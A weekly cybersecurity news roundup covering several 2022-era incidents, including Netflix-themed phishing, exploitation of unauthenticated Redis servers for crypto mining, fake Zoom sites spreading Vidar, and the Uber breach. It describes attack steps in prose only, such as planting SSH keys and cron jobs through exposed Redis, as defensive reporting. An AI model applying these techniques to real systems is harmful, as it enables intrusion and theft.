Governments, Businesses, and individuals can experience huge complications if they suffer a data breach. A small vulnerability can expose sensitive information if they don’t pay attention to detail. Following is a summary of the latest breach-related news of this week.
Netflix Threat Actors Stage a Credential Harvesting Heist
Over the past years, Netflix customers have been warned about various phishing threats, sharing a common theme – credential harvesting. Cybercriminals send phishing emails to convince users that their Netflix account is in jeopardy and must update their credit card details to rectify the situation.
INKY recently detected Netflix getting impersonated in a PII data harvesting campaign using compressed HTML attachments in zip files. The HTML attachments give the attackers a strategic advantage because they host the malicious website on the victim’s machine, not the Internet. Thus, they can avoid standard URL reputation checks, and the phishing content does not get detected.
How the attack happens
- In the campaign, the attackers spoofed all sender email addresses to look like they came from Netflix’s domain. They sent phishing emails from a malicious mail server controlled by a Peruvian university.
- Recipients got a request to resolve an account issue by downloading an attached form.
- The email contains a zip file, which unzips an HTML attachment that builds a Personally Identifiable Information (credit card info, billing address, date of birth, etc.) harvesting form hosted on the victim’s machine.
- Clicking “Agree and Continue” forwards the data to a bad actor.
Over 39k Unauthenticated and Internet-Exposed Redis Services Targeted in a Cryptocurrency Campaign
Redis is an open-source data structure tool used as an in-memory message broker, distributed database, or cache. The developers did not design the tool to get exposed on the Internet; however, researchers discovered multiple Redis instances publicly accessible, missing authentication.
Researcher Victor Zhu detailed the Redis unauthorized access vulnerability that hackers could exploit and compromise Redis instances exposed online. “Under certain circumstances, if the Redis services run with the root account, attackers can write the root account’s SSH public key file and directly login to the victim’s server. It allows threat actors to delete or steal data, gain server privileges, or execute encryption extortion, critically endangering normal operations.”
The experts discovered evidence demonstrating the ongoing hacking campaign, where threat actors used the file “/var/spool/cron/root” to store malicious crontab entries utilizing several prefixed Redis keys with the string “backup.” The cybercriminals used the crontab entries to execute a remote server-hosted shell script.
The shell script:
- Disables and stops running security-related processes.
- Disables and stops running system monitoring processes
- Removes and purges all security-related and system log files, including shell histories (e.g., .bash_history).
- Adds a new SSH key to the victim’s authorized_keys file
- Disables the iptables firewall
- Installs several scanning and hacking tools like “masscan.”
- Installs and runs the crypto mining application XMRig
Hackers Steal Millions from Healthcare – Warns FBI
The FBI recently warned healthcare organizations to be vigilant of cybercriminals targeting payment processors, who divert funds to their bank accounts. It further added that bad actors stole over $4.6 million this year by compromising access to user accounts and altering the payment information.
Cybercriminals’ dirty tricks:
- They use publicly available personal information and social engineering techniques to gain unauthorized access to victims’ websites, payment details, and healthcare portals.
- Furthermore, they spoofed support centers and gained access to companies handling and delivering healthcare reimbursements.
- The threat actors can alter the Exchange Server’s configurations and rewrite the rules for targeted accounts, allowing them to receive the victim’s message copy.
Healthcare sector under attack
The healthcare sector has seen numerous cybercriminal assaults in the recent past:
- The Texas OakBend Medical Center suffered a ransomware attack that disrupted its communication and IT systems.
- HC3 noted that the Karakurt ransomware group carried out at least four cyberattacks affecting the U.S. public health and healthcare sectors since June.
- Russia-based Evil Corp targeted the U.S. healthcare sector to gain intellectual information using tools like Dridex and other ransomware.
2-Step Email Attack Executes Payload Using Powtoon Video
According to a report, the attacks begin when the victim receives an email that suggests it contains an invoice from the British email security firm Egress.
An Egress spokesperson said their investigation shows that the attack is a standard brand impersonation tactic. “As you know, cybercriminals leverage many well-known and trusted brands to give legitimacy to their malicious attacks. In the reported instance, the recipients got a phishing email using an Egress Protect (email encryption) template.”
The spokesperson further added they could assure the users that there is no evidence that Egress became the victim of a phishing attack. Furthermore, he dismissed all reports of account takeover attacks involving Egress employees or users as false. “The Egress customers or users need not take any action now.”
Once the user opens the scam Egress invoice, they are redirected to Powtoon, the legitimate video-sharing platform. The threat actors play a malicious video on Powtoon, ultimately presenting the user with a very convincing malicious Microsoft login page to harvest their credentials.
Fake Zoom Sites Deploy Vidar Malware
CRIL (Cyble Research and Intelligence Labs) recently discovered multiple fake Zoom sites designed to spread malware among Zoom users. The websites are designed with a similar user interface, and the malware seems like Zoom’s legitime application.
Details About the Malware
CRIL analyzed the malware and established that it was Vidar Stealer, a malicious code with links to the Arkei stealer. Vidar steals the following information from an infected device:
- Banking Information
- Saved Passwords
- IP Addresses
- Browser history
- Login credentials
Following is a list of fake Zoom websites to avoid:
How the Vidar Malware Works
The deceiving sites redirect victims to a GitHub URL to download a malicious application which, upon execution, drops the following binaries in the temporary folder:
These files execute the cybercriminal’s code to steal information from the machine.
Oracle Cloud Infrastructure: Critical Vulnerability Allows Unauthorized Access
A recently discovered vulnerability in OCI (Oracle Cloud Infrastructure) allows unauthorized access to all users’ cloud storage volumes, violating cloud isolation. The flaw, which secure cloud experts at Wiz discovered and dubbed as AttachMe, is part of the new advisory the company published.
According to Oracle, they patched the flaw for all customers within 24 hours of getting informed by Wiz. However, Elad Gabay, Wiz’s senior software engineer, said that before patching, an attacker might have leveraged the vulnerability to target all OCI users.
“The attacker might have read from or written to any attached or unattached storage volumes allowing multi–attachment provided he had its OCID (Oracle Cloud Identifier). Thus, it might have allowed exfiltration of sensitive data or initiation of destructive attacks by executable file manipulation.”
The Wiz advisory states that the potential attacks resulting from a hacker aware of the flaw included cross–tenant access and privilege escalation.
Uber Suffers Breach, Hackers Steal Vulnerability Reports
According to sources, a cyberattack forced Uber to shut down several engineering and internal communications systems. Uber recently confirmed that its high-security internal systems were targeted in a data breach by a cybercriminal who claims to have access to Uber’s sensitive data. The company tweeted that it had informed the law enforcement authorities and is investigating the incident.
The threat actors provided screenshots of Uber’s IT systems, Slack server, Windows domain, and email dashboard. Additionally, they may have access to Uber’s Google-hosted cloud infrastructure and Amazon Web Services dashboard.
As per the report published by The New York Times, the attacker targeted a Uber employee’s Slack account using social engineering to gain initial access. The attacker used the stolen credentials and accessed Uber’s internal systems containing classified information. Uber did not confirm if any customer data was compromised.
Microsoft 365 Phishing Attacks Spoof U.S. Govt Websites
A progressive phishing campaign targeting U.S. government contractors is expanding its operation to push better-crafted documents and higher-quality lures. The lure in the phishing emails is the request for bids for profitable government projects, redirecting victims to phishing pages that clone legitimate federal agency portals.
The Cofense report says the operatives expanded their targeting and now spoof the Department of Commerce and the Department of Transportation. Moreover, hackers are using many unique lures in the messages, removing grammatical typos in the attached PDFs and a better phishing web page behavior.
The phishing emails, according to Cofense, now feature larger logos, more consistent formatting, and a link to the PDF instead of a file attachment. The phishing websites also exhibit targeted improvements, like using HTTPS on all websites in the same domain.